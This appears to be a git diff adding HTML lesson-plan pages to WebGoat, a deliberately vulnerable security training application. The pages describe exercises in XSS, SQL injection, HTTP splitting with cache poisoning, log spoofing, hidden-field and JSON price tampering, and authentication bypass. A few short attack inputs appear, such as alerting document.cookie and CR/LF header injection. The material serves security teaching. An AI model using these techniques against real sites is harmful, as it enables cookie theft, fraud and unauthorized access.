+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
+<html>
+<head>
+               
+  <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
+  <title>Lesson Plan</title>
+</head>
+  <body>
+ 
+<div align="Center"> 
+<p><b>Lesson Plan Title:</b> Shopping Cart Concurrency Flaw </p>
+ </div>
+ 
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+ Web applications can handle many HTTP requests simultaneously.  Developers often use variables that are not thread safe. &nbsp;Thread safety means that the fields of an object or class always maintain a valid state when used concurrently by multiple threads. It is often possible to exploit a concurrency bug by loading the same page as another user at the exact same time. Because all threads share the same method area, and the method area is where all class variables are stored, multiple threads can attempt to use the same class variables concurrently. <br>
+<!-- Stop Instructions -->
+<p><b>General Goal(s):</b> </p>
+For this exercise, your mission is to exploit the concurrency issue which will allow you to purchase merchandise for a lower price.
+<br>
+</body>
+</html>
diff --git a/main/project/WebContent/lesson_plans/CrossSiteScripting.html b/main/project/WebContent/lesson_plans/CrossSiteScripting.html
new file mode 100644
index 000000000..1d2848f3c
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/CrossSiteScripting.html
@@ -0,0 +1,12 @@
+<div align="Center">
+<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
+</div>
+<p><b>Concept / Topic To Teach:</b></p>
+<!-- Start Instructions -->
+It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved.<br>
+XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it. 
+<!-- Stop Instructions -->
+<p><b>General Goal(s):</b></p>
+For this exercise, you will perform stored and reflected XSS attacks.  You will also implement code changes in the web application to defeat these attacks.
+<br>
+
diff --git a/main/project/WebContent/lesson_plans/DBCrossSiteScripting.html b/main/project/WebContent/lesson_plans/DBCrossSiteScripting.html
new file mode 100755
index 000000000..a54fd9ab9
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/DBCrossSiteScripting.html
@@ -0,0 +1,24 @@
+<div align="Center">
+<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting
+(XSS)</p>
+</div>
+<p><b>Concept / Topic To Teach:</b></p>
+<!-- Start Instructions -->
+It is always a good practice to scrub all inputs, especially those
+inputs that will later be used as parameters to OS commands, scripts,
+and database queries. It is particularly important for content that will
+be permanently stored somewhere. Users should not be able to create
+message content that could cause another user to load an undesirable
+page or undesirable content when the user's message is retrieved.
+<br>
+XSS can also occur when unvalidated user input is used in an HTTP
+response. In a reflected XSS attack, an attacker can craft a URL with
+the attack script and post it to another website, email it, or otherwise
+get a victim to click on it.
+<!-- Stop Instructions -->
+<p><b>General Goal(s):</b></p>
+For this exercise, you will perform a stored XSS attack.
+You will also implement code changes in the database to defeat
+these attacks.
+<br>
+
diff --git a/main/project/WebContent/lesson_plans/DBSQLInjection.html b/main/project/WebContent/lesson_plans/DBSQLInjection.html
new file mode 100755
index 000000000..879a1b92e
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/DBSQLInjection.html
@@ -0,0 +1,16 @@
+<div align="Center">
+<p><b>Lesson Plan Title:</b> How to Perform SQL Injection</p>
+</div>
+<p><b>Concept / Topic To Teach:</b></p>
+<!-- Start Instructions -->
+It is always a good practice to scrub all inputs, especially those
+inputs that will later be used as parameters to OS commands, scripts,
+and database queries. Users should not be able to alter the intent of
+commands that are executed on the server, in many cases as a privileged user.
+<!-- Stop Instructions -->
+<p><b>General Goal(s):</b></p>
+For this exercise, you will perform a SQL Injection attack.
+You will also implement code changes in the database to defeat
+these attacks.
+<br>
+
diff --git a/main/project/WebContent/lesson_plans/DOMInjection.html b/main/project/WebContent/lesson_plans/DOMInjection.html
new file mode 100644
index 000000000..19c19ee0b
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/DOMInjection.html
@@ -0,0 +1,23 @@
+<div align="Center"> 
+<p><b>Lesson Plan Title:</b> How to Perform DOM Injection Attack. </p>
+ </div>
+ 
+<p><b>Concept / Topic To Teach:</b> </p>
+How to perform DOM injection attacks.
+ <br> 
+<div align="Left"> 
+<p>
+<b>How the attacks works:</b>
+</p>
+Some applications specially the ones that uses AJAX manipulates and updates the DOM
+directly using javascript, DHTML and eval() method.<br>
+An attacker may take advantage of that by intercepting the reply and try to inject some 
+javascript commands to exploit his attacks.
+</div>
+<p><b>General Goal(s):</b> </p>
+<!-- Start Instructions -->
+* Your victim is a system that takes an activation key to allow you to use it.<br>
+* Your goal should be to try to get to enable the activate button.<br>
+* Take some time to see the HTML source in order to understand how the key validation process works.<br>
+<!-- Stop Instructions -->
+
diff --git a/main/project/WebContent/lesson_plans/DOMXSS.html b/main/project/WebContent/lesson_plans/DOMXSS.html
new file mode 100644
index 000000000..fb7008727
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/DOMXSS.html
@@ -0,0 +1,15 @@
+<div align="Center">
+<p><b>Lesson Plan Title: </b>DOM Based Cross Site Scripting (XSS)</p>
+</div>
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+The Document Object Model (DOM) presents an interesting problem from
+a security standpoint.  It allows the content of a web page to be dynamically
+modified, but that can be abused by attackers during a malicious code injection.  XSS,
+a type of malicious code injection, can occur when unvalidated user input is used directly
+to modify the content of a page on the client side.
+<!-- Stop Instructions -->
+<p><b>General Goal(s):</b> </p>
+For this exercise, your mission is to use this vulnerability to inject
+malicious code into the DOM.  Then in the last stage, you will correct
+the flaws in the code to address the vulnerability.
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_plans/DOS_Login.html b/main/project/WebContent/lesson_plans/DOS_Login.html
new file mode 100644
index 000000000..941a89b49
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/DOS_Login.html
@@ -0,0 +1,9 @@
+<div align="Center">
+<p><b>Lesson Plan Title:</b> Denial of Service from Multiple Logins</p>
+</div>
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+Denial of service attacks are a major issue in web applications. If the end user cannot conduct business or perform the service offered by the web application, then both time and money is wasted.
+<p><b>General Goal(s):</b> </p>
+This site allows a user to login multiple times. This site has a database connection pool that allows 2 connections. You must obtain a list of valid users and create a total of 3 logins.
+<!-- Stop Instructions -->
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_plans/DangerousEval.html b/main/project/WebContent/lesson_plans/DangerousEval.html
new file mode 100644
index 000000000..f6190530c
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/DangerousEval.html
@@ -0,0 +1,14 @@
+<div align="Center">
+<p><b>Lesson Plan Title: </b>Dangerous Use of Eval</p>
+</div>
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+It is always a good practice to validate all input on the server side. XSS can occur
+when unvalidated user input is reflected directly into an HTTP response. In this lesson, unvalidated
+user-supplied data is used in conjunction with a Javascript eval() call. In a reflected
+XSS attack, an attacker can craft a URL with the attack script and store it on another
+website, email it, or otherwise trick a victim into clicking on it.
+<!-- Stop Instructions -->
+<p><b>General Goal(s):</b> </p>
+For this exercise, your mission is to come up with some input which, when run through eval,
+will execute a malicious script. In order to pass this lesson, you must 'alert()' document.cookie.
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_plans/Encoding.html b/main/project/WebContent/lesson_plans/Encoding.html
new file mode 100644
index 000000000..fcba2ddac
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/Encoding.html
@@ -0,0 +1,9 @@
+<div align="Center">
+<p><b>Lesson Plan Title:</b> How to Peform Basic Encoding</p>
+</div>
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+Different encoding schemes can be used in web applications for different reasons. 
+<!-- Stop Instructions -->
+<p><b>General Goal(s):</b> </p>
+This lesson will familiarize the user with different encoding schemes. 
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_plans/FailOpenAuthentication.html b/main/project/WebContent/lesson_plans/FailOpenAuthentication.html
new file mode 100644
index 000000000..27a82e2cf
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/FailOpenAuthentication.html
@@ -0,0 +1,10 @@
+<div align="Center"> 
+<p><b>Lesson Plan Title:</b> How to Bypass Fail Open Authentication </p>
+ </div>
+ 
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+ This lesson presents the basics for understanding the "fail open" condition regarding authentication.   The security term, &#8220;fail open&#8221; describes a behavior of a verification mechanism.   This is when an error (i.e. unexpected exception) occurs during a verification method causing that method to evaluate to true. This is especially dangerous during login.  <br>
+ <!-- Stop Instructions -->
+<p><b>General Goal(s):</b> </p>
+ The user should be able to bypass the authentication check.  
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_plans/ForcedBrowsing.html b/main/project/WebContent/lesson_plans/ForcedBrowsing.html
new file mode 100644
index 000000000..2bf4fa6a4
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/ForcedBrowsing.html
@@ -0,0 +1,21 @@
+<div align="Center"> 
+<p><b>Lesson Plan Title:</b> How to Perform Forced Browsing Attacks. </p>
+ </div>
+ 
+<p><b>Concept / Topic To Teach:</b> </p>
+How to Exploit Forced Browsing.
+ <br> 
+<div align="Left"> 
+<p>
+<b>How the attacks works:</b>
+</p>
+Forced browsing is a technique used by attackers to gain access to resources that are not referenced, but are nevertheless accessible. 
+
+One technique is to manipulate the URL in the browser by deleting sections from the end until an unprotected directory is found
+</div>
+<p><b>General Goal(s):</b> </p>
+<!-- Start Instructions -->
+* Your goal should be to try to guess the URL for the "config" interface.<br>
+* The "config" URL is only available to the maintenance personnel.<br>
+* The application doesn't check for horizontal privileges.
+<!-- Stop Instructions -->
diff --git a/main/project/WebContent/lesson_plans/ForgotPassword.html b/main/project/WebContent/lesson_plans/ForgotPassword.html
new file mode 100644
index 000000000..06b2feb2f
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/ForgotPassword.html
@@ -0,0 +1,9 @@
+<div align="Center">
+<p><b>Lesson Plan Title:</b> How to Exploit the Forgot Password Page</p>
+</div>
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+Web applications frequently provide their users the ability to retrieve a forgotten password. Unfortunately, many web applications fail to implement the mechanism properly. The information required to verify the identity of the user is often overly simplistic.
+<p><b>General Goal(s):</b> </p>
+Users can retrieve their password if they can answer the secret question properly. There is no lock-out mechanism on this 'Forgot Password' page. Your username is 'webgoat' and your favorite color is 'red'. The goal is to retrieve the password of another user.
+<!-- Stop Instructions -->
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_plans/HiddenFieldTampering.html b/main/project/WebContent/lesson_plans/HiddenFieldTampering.html
new file mode 100644
index 000000000..65a641fda
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/HiddenFieldTampering.html
@@ -0,0 +1,9 @@
+<div align="Center">
+<p><b>Lesson Plan Title:</b> How to Exploit Hidden Fields </p>
+</div>
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+Developers will use hidden fields for tracking, login, pricing, etc.. information on a loaded page. While this is a convenient and easy mechanism for the developer, they often don't validate the information that is received from the hidden field.  This lesson will teach the attacker to find and modify hidden fields to obtain a product for a price other than the price specified  <br>
+<!-- Stop Instructions -->
+<p><b>General Goal(s):</b> </p>
+The user should be able to exploit a hidden field to obtain a product at an incorrect price.
diff --git a/main/project/WebContent/lesson_plans/HtmlClues.html b/main/project/WebContent/lesson_plans/HtmlClues.html
new file mode 100644
index 000000000..f3aa39f39
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/HtmlClues.html
@@ -0,0 +1,11 @@
+<div align="Center"> 
+<p><b>Lesson Plan Title:</b> How to Discover Clues in the HTML </p>
+ </div>
+ 
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+ Developers are notorious for leaving statements like FIXME's, Code Broken, Hack, etc... inside the source code. &nbsp;Review the source code for any comments denoting&nbsp; passwords, backdoors, or something doesn't work right.&nbsp;
+<!-- Stop Instructions -->
+<br>
+<p><b>General Goal(s):</b> </p>
+ The user should be able to bypass the authentication check.
diff --git a/main/project/WebContent/lesson_plans/HttpBasics.html b/main/project/WebContent/lesson_plans/HttpBasics.html
new file mode 100644
index 000000000..9e9bad245
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/HttpBasics.html
@@ -0,0 +1,27 @@
+<div align="Center"> 
+<p><b>Lesson Plan Title:</b> Http Basics </p>
+ </div>
+ 
+<p><b>Concept / Topic To Teach:</b> </p>
+ This lesson presents the basics for understanding the transfer of data between the browser and the web application.<br>
+<div align="Left"> 
+<p>
+<b>How HTTP works:</b>
+</p>
+All HTTP transactions follow the same general format. Each client request and server response has three parts:  the request or response line, a header section, and the entity body. The client initiates a transaction as follows: <br>
+<br>
+ The client contacts the server and sends a document request <br>
+</div>
+  <br>
+<ul>GET /index.html?param=value HTTP/1.0</ul>
+ Next, the client sends optional header information to inform the server of its configuration and the document formats it will accept.<br>
+ <br>
+<ul>User-Agent: Mozilla/4.06 Accept: image/gif,image/jpeg, */*</ul>
+After sending the request and headers, the client may send additional data. This data is mostly used by CGI programs using the POST method.<br>
+<p><b>General Goal(s):</b> </p>
+<!-- Start Instructions -->
+Enter your name in the input field below and press "go" to submit. The server will accept the request, reverse the input, and display it back to the user, illustrating the basics of handling an HTTP request.
+<br/><br/>
+The user should become familiar with the features of WebGoat by manipulating the above 
+buttons to view hints, show the HTTP request parameters, the HTTP request cookies, and the Java source code.
+<!-- Stop Instructions -->
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_plans/HttpOnly.html b/main/project/WebContent/lesson_plans/HttpOnly.html
new file mode 100644
index 000000000..535439d3c
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/HttpOnly.html
@@ -0,0 +1,25 @@
+<div align="Center">
+<p><b>Lesson Plan Title:</b> HttpOnly Test</p>
+</div>
+<p><b>Concept / Topic To Teach:</b></p>
+<!-- Start Instructions -->
+To help mitigate the cross site scripting threat, Microsoft has
+introduced a new cookie attribute entitled 'HttpOnly.' If this flag is
+set, then the browser should not allow client-side script to access the
+cookie. Since the attribute is relatively new, several browsers neglect
+to handle the new attribute properly.
+<p><b>General Goal(s):</b></p>
+The purpose of this lesson is to test whether your browser supports the
+HTTPOnly cookie flag. Note the value of the
+<strong>unique2u</strong>
+cookie. If your browser supports HTTPOnly, and you enable it for a
+cookie, client side code should NOT be able to read OR write to that
+cookie, but the browser can still send its value to the server. Some
+browsers only prevent client side read access, but don't prevent write
+access.
+<br />
+<br />
+With the HTTPOnly attribute turned on, type
+"javascript:alert(document.cookie)" in the browser address bar. Notice
+all cookies are displayed except the unique2u cookie.
+<!-- Stop Instructions -->
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_plans/HttpSplitting.html b/main/project/WebContent/lesson_plans/HttpSplitting.html
new file mode 100644
index 000000000..191d1aba4
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/HttpSplitting.html
@@ -0,0 +1,32 @@
+<div align="Center"> 
+<p><b>Lesson Plan Title:</b> How to Perform Http Splitting </p>
+ </div>
+ 
+<p><b>Concept / Topic To Teach:</b> </p>
+ This lesson teaches how to perform HTTP Splitting attacks.
+ <br> 
+<div align="Left"> 
+<p>
+<b>How the attacks works:</b>
+</p>
+The attacker passes malicious code to the web server together with normal input. 
+A victim application will not be checking for CR (carriage return, also given by %0d or \r) 
+and LF (line feed, also given by %0a or \n)characters. These characters not only give attackers control 
+of the remaining headers and body of the response the application intends to send, 
+but also allows them to create additional responses entirely under their control.<br>
+The effect of an HTTP Splitting attack is maximized when accompanied with a Cache Poisoning. The goal of
+Cache Poisoning attack is to poison the cache of the victim by fooling the cache to believe that the page
+hijacked using the HTTP splitting is a good one and it is indeed the server's copy.<br>
+The attack happens using the HTTP Splitting attack plus adding the <b>Last-Modified:</b> header and setting it
+to a future date. This will force the browser to send <b>If-Modified-Since</b> request header, which gives the attacker
+the chance to intercept the server's reply and replace it with a '304 Not Modified' reply. A sample of a 304 response is:<br>
+HTTP/1.1 304 Not Modified <br>
+Date: Fri, 30 Dec 2005 17:32:47 GMT
+
+</div>
+<p><b>General Goal(s):</b> </p>
+<!-- Start Instructions -->
+This lesson has two stages. Stage 1 teaches you how to do HTTP Splitting attacks while stage 2 builds on that to teach you how to elevate HTTP Splitting to Cache Poisoning.<br>
+Enter a language for the system to search by. You will notice that the application is redirecting your request to another resource on the server. You should be able to use the CR (%0d) and LF (%0a) to exploit the attack. Your exercise should be to force the server to send a 200 OK. If the screen changed as an effect to your attack, just go back to the homepage and after stage 2 is exploited successfully you will find the green check in the left menu.
+<!-- Stop Instructions -->
+
diff --git a/main/project/WebContent/lesson_plans/JSONInjection.html b/main/project/WebContent/lesson_plans/JSONInjection.html
new file mode 100644
index 000000000..4c72bd04f
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/JSONInjection.html
@@ -0,0 +1,24 @@
+<div align="Center"> 
+<p><b>Lesson Plan Title:</b> How to Perform JSON Injection </p>
+ </div>
+ 
+<p><b>Concept / Topic To Teach:</b> </p>
+This lesson teaches how to perform JSON Injection Attacks.
+<br> 
+<div align="Left"> 
+<p>
+<b>How the attacks works:</b>
+</p>
+JavaScript Object Notation (JSON) is a simple and effective lightweight data exchange format. JSON can be in a lot of forms such as arrays, lists, hashtables and other data structures.
+JSON is widely used in AJAX and Web2.0 application and is favored by programmers over XML because of its ease of use and speed.
+However, JSON, like XML is prone to Injection attacks. A malicious attacker can inject the reply from the server and inject some arbitrary values in there.
+
+</div>
+<p><b>General Goal(s):</b> </p>
+<!-- Start Instructions -->
+* You are traveling from Boston, MA- Airport code BOS to Seattle, WA - Airport code SEA.<br> 
+* Once you enter the three digit code of the airport, an AJAX request will be executed asking for the ticket price.<br>
+* You will notice that there are two flights available, an expensive one with no stops and another cheaper one with 2 stops.<br>
+* Your goal is to try to get the one with no stops but for a cheaper price.
+<!-- Stop Instructions -->
+
diff --git a/main/project/WebContent/lesson_plans/JavaScriptValidation.html b/main/project/WebContent/lesson_plans/JavaScriptValidation.html
new file mode 100644
index 000000000..5ea803d95
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/JavaScriptValidation.html
@@ -0,0 +1,10 @@
+<div align="Center">
+<p><b>Lesson Plan Title:</b> How to Bypass Client Side JavaScript Validation </p>
+</div>
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+Client-side validation should not be considered a secure means of validating parameters. These validations only help reduce the amount of server processing time for normal users who do not know the format of required input. Attackers can bypass these mechanisms easily in various ways. Any client-side validation should be duplicated on the server side. This will greatly reduce the likelihood of insecure parameter values being used in the application.
+<!-- Stop Instructions -->
+<br>
+<p><b>General Goal(s):</b> </p>
+For this exercise, the web site requires that you follow certain rules when you fill out a form. The user should be able to break those rules, and send the website input that it wasn't expecting. <br>
diff --git a/main/project/WebContent/lesson_plans/Lesson_Plan_Template.html b/main/project/WebContent/lesson_plans/Lesson_Plan_Template.html
new file mode 100644
index 000000000..66293a95c
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/Lesson_Plan_Template.html
@@ -0,0 +1,17 @@
+<div align="Center">
+<p><b>Lesson Plan Title:</b> </p>
+</div>
+<!-- Start Instructions -->
+<p><b>Concept / Topic To Teach:</b> </p>
+<p><b>Standards Addressed:</b> </p>
+<p><b>General Goal(s):</b> </p>
+<p><b>Specific Objectives:</b> </p>
+<p><b>Required Materials:</b> </p>
+<p><b>Anticipatory Set (Lead-In):</b> </p>
+<p><b>Step-By-Step Procedures:</b> </p>
+<p><b>Plan For Independent Practice:</b> </p>
+<p><b>Closure (Reflect Anticipatory Set):</b> </p>
+<p><b>Assessment Based On Objectives:</b> </p>
+<p><b>Extensions (For Gifted Students):</b> </p>
+<p><b>Possible Connections To Other Subjects:</b> </p>
+<!-- Stop Instructions -->
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_plans/LogSpoofing.html b/main/project/WebContent/lesson_plans/LogSpoofing.html
new file mode 100644
index 000000000..105e38f54
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/LogSpoofing.html
@@ -0,0 +1,20 @@
+<div align="Center"> 
+<p><b>Lesson Plan Title:</b> How to Perform Log Spoofing. </p>
+ </div>
+ 
+<p><b>Concept / Topic To Teach:</b> </p>
+ This lesson teaches attempts to fool the human eye.
+ <br> 
+<div align="Left"> 
+<p>
+<b>How the attacks works:</b>
+The attack is based on fooling the humane eye in log files. An attacker can erase his traces from the logs
+using this attack.
+</p>
+</div>
+<p><b>General Goal(s):</b> </p>
+<!-- Start Instructions -->
+* The grey area below represents what is going to be logged in the web server's log file.<br>
+* Your goal is to make it like a username "admin" has succeeded into logging in.<br/>
+* Elevate your attack by adding a script to the log file.
+<!-- Stop Instructions -->
diff --git a/main/project/WebContent/lesson_plans/NewLesson.html b/main/project/WebContent/lesson_plans/NewLesson.html
new file mode 100644
index 000000000..fff75b625
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/NewLesson.html
@@ -0,0 +1,18 @@
+<div align="Center"> 
+<p><b>Lesson Plan Title:</b> How to Add a New WebGoat Lesson </p>
+ </div>
+ 
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+Adding lessons to WebGoat is very easy. If you have an idea that would be suitable<br> 
+for a new lesson, follow these few simple instructions to implement it:<br><br>
+* Download the source code from <a href="http://code.google.com/p/webgoat/">here.</a><br><br>
+* Setup framework: follow the simple instructions in "HOW TO create the WebGoat workspace.txt" that comes with the project.<br><br>
+* You need to add two files for each new lesson: <br>
+&nbsp;&nbsp;- YourLesson.java to org.owasp.webgoat.lessons<br>
+&nbsp;&nbsp;- YourLesson.html to WebContent/lesson_plans<br><br>
+<!-- Stop Instructions -->
+<br>
+ 
+<p><b>General Goal(s):</b> </p>
+ The user should be able to learn how to add a new lesson.  
diff --git a/main/project/WebContent/lesson_plans/PathBasedAccessControl.html b/main/project/WebContent/lesson_plans/PathBasedAccessControl.html
new file mode 100644
index 000000000..235bd2528
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/PathBasedAccessControl.html
@@ -0,0 +1,9 @@
+<div align="Center">
+<p><b>Lesson Plan Title:</b> How to Bypass a Path Based Access Control Scheme </p>
+</div>
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+In a path based access control scheme, an attacker can traverse a path by providing relative path information. Therefore an attacker can use relative paths to access files that normally are not directly accessible by anyone, or would otherwise be denied if requested directly. 
+<!-- Stop Instructions -->
+<p><b>General Goal(s):</b> </p>
+The user should be able to access a file that is not in the listed directory.
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_plans/ReflectedXSS.html b/main/project/WebContent/lesson_plans/ReflectedXSS.html
new file mode 100644
index 000000000..745d3aa6d
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/ReflectedXSS.html
@@ -0,0 +1,9 @@
+<div align="Center">
+<p><b>Lesson Plan Title: </b>How to Perform Reflected Cross Site Scripting (XSS)</p>
+</div>
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+It is always a good practice to validate all input on the server side. XSS can occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it. 
+<!-- Stop Instructions -->
+<p><b>General Goal(s):</b> </p>
+For this exercise, your mission is to come up with some input containing a script. You have to try to get this page to reflect that input back to your browser, which will execute the script and do something bad.
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_plans/RemoteAdminFlaw.html b/main/project/WebContent/lesson_plans/RemoteAdminFlaw.html
new file mode 100644
index 000000000..e852cbcba
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/RemoteAdminFlaw.html
@@ -0,0 +1,11 @@
+<div align="Center">
+<p><b>Lesson Plan Title: </b>How to Force Browser Web Resources</p>
+</div>
+<p><b>Concept / Topic To Teach:</b> </p>
+Applications will often have an administrative interface that allows privileged users access to functionality that normal users shouldn't see. The application server will often have an admin interface as well.  
+<p><b>Standards Addressed :</b> </p>
+<p><b>General Goal(s):</b> 
+<!-- Start Instructions -->
+Try to access the administrative interface for WebGoat. You may also try to access the administrative interface for Tomcat.  The Tomcat admin interface can be accessed via a URL (/admin) and will not count towards the completion of this lesson. 
+<!-- Stop Instructions -->
+</p>
diff --git a/main/project/WebContent/lesson_plans/RoleBasedAccessControl.html b/main/project/WebContent/lesson_plans/RoleBasedAccessControl.html
new file mode 100644
index 000000000..132dc235f
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/RoleBasedAccessControl.html
@@ -0,0 +1,15 @@
+<div align="Center">
+<p><b>Lesson Plan Title:</b> Role Based Access Control</p>
+</div>
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+In role-based access control scheme, a role represents a set of access permissions and privileges. A user can be assigned one or more roles. A role-based access control normally consists of two parts: role permission management and role assignment. A broken role-based access control scheme might allow a user to perform accesses that are not allowed by his/her assigned roles, or somehow obtain unauthorized roles.  
+<!-- Stop Instructions -->
+<p><b>General Goal(s):</b> </p>
+Your goal is to explore the access control rules that govern this site. Each role has permission to certain resources (A-F). Each user is assigned one or more roles. Only the user with the [Admin] role should have access to the 'F' resources. In a successful attack, a user doesn't have the [Admin] role can access resource F.
+<p><b>Lesson Resources:</b> </p>
+<a href="lessons/RoleBasedAccessControl/images/orgChart.jpg" onclick="makeWindow(this.href, 'Org Chart');return false;" target="orgChartWin">Org Chart</a>
+<br>
+<a href="lessons/RoleBasedAccessControl/images/accessControl.jpg" onclick="makeWindow(this.href, 'Access Control Matrix');return false;" target="accessControlWin">Access Control Matrix</a>
+<br>
+<a href="lessons/RoleBasedAccessControl/images/dbSchema.jpg" onclick="makeWindow(this.href, 'Access Control Matrix');return false;" target="accessControlWin">Database Schema</a>
diff --git a/main/project/WebContent/lesson_plans/SameOriginPolicyProtection.html b/main/project/WebContent/lesson_plans/SameOriginPolicyProtection.html
new file mode 100644
index 000000000..b7db5d10e
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/SameOriginPolicyProtection.html
@@ -0,0 +1,13 @@
+<div align="Center">
+<p><b>Lesson Plan Title: </b>Same Origin Policy Protection</p>
+</div>
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+A key element of AJAX is the XMLHttpRequest (XHR), which allows javascript to make asynchronous 
+calls from the client side to a server.  However, as a security measure these requests may 
+only be made to the server from which the client page originated.
+<!-- Stop Instructions -->
+<p><b>General Goal(s):</b> </p>
+This exercise demonstrates the Same Origin Policy Protection.  XHR requests 
+can only be passed back to the originating server.  Attempts to pass data to 
+a non-originating server will fail.";
diff --git a/main/project/WebContent/lesson_plans/SilentTransactions.html b/main/project/WebContent/lesson_plans/SilentTransactions.html
new file mode 100644
index 000000000..d3377dce8
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/SilentTransactions.html
@@ -0,0 +1,24 @@
+<div align="Center"> 
+<p><b>Lesson Plan Title:</b> How to Perform Silent Transactions Attacks. </p>
+ </div>
+ 
+<p><b>Concept / Topic To Teach:</b> </p>
+This lesson teaches how to perform silent transactions attacks.
+ <br> 
+<div align="Left"> 
+<p>
+<b>How the attacks works:</b>
+</p>
+Any system that silently processes transactions using a single submission is dangerous to the client. 
+For example, if a normal web application allows a simple URL submission, a preset session attack will 
+allow the attacker to complete a transaction without the user’s authorization. 
+In Ajax, it gets worse: the transaction is silent; it happens with no user feedback on the page, 
+so an injected attack script may be able to steal money from the client without authorization.<br>
+</div>
+<p><b>General Goal(s):</b> </p>
+<!-- Start Instructions -->
+* This is a sample internet banking application - money transfer page.<br>
+* It shows below your balance, the account you are transferring to and amount you will transfer.<br>
+* The application uses AJAX to submit the transaction after doing some basic client side validations.<br>
+* Your goal is to try to bypass the user's authorization and silently execute the transaction.<br>
+<!-- Stop Instructions -->
diff --git a/main/project/WebContent/lesson_plans/SoapRequest.html b/main/project/WebContent/lesson_plans/SoapRequest.html
new file mode 100644
index 000000000..1b7b6b0e4
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/SoapRequest.html
@@ -0,0 +1,9 @@
+<div align="Center">
+<p><b>Lesson Plan Title:</b> How to Create a SOAP Request</p>
+</div>
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL). Let's learn something about WSDL files. Check out WebGoat's web service description language (WSDL) file. 
+<p><b>General Goal(s):</b> </p>
+Try connecting to the WSDL with a browser or Web Service tool. The URL for the web service is: http://localhost/WebGoat/services/SoapRequest The WSDL can usually be viewed by adding a ?WSDL on the end of the web service request.
+<!-- Stop Instructions -->
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_plans/SqlNumericInjection.html b/main/project/WebContent/lesson_plans/SqlNumericInjection.html
new file mode 100644
index 000000000..17a789ba9
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/SqlNumericInjection.html
@@ -0,0 +1,14 @@
+<div align="Center"> 
+<p><b>Lesson Plan Title:</b> How to Perform Numeric SQL Injection </p>
+ </div>
+ 
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack. 
+<br><br>
+Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.<br>
+<br>
+It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queiries, even if the threat of SQL injection has been prevented in some other manner.<br>
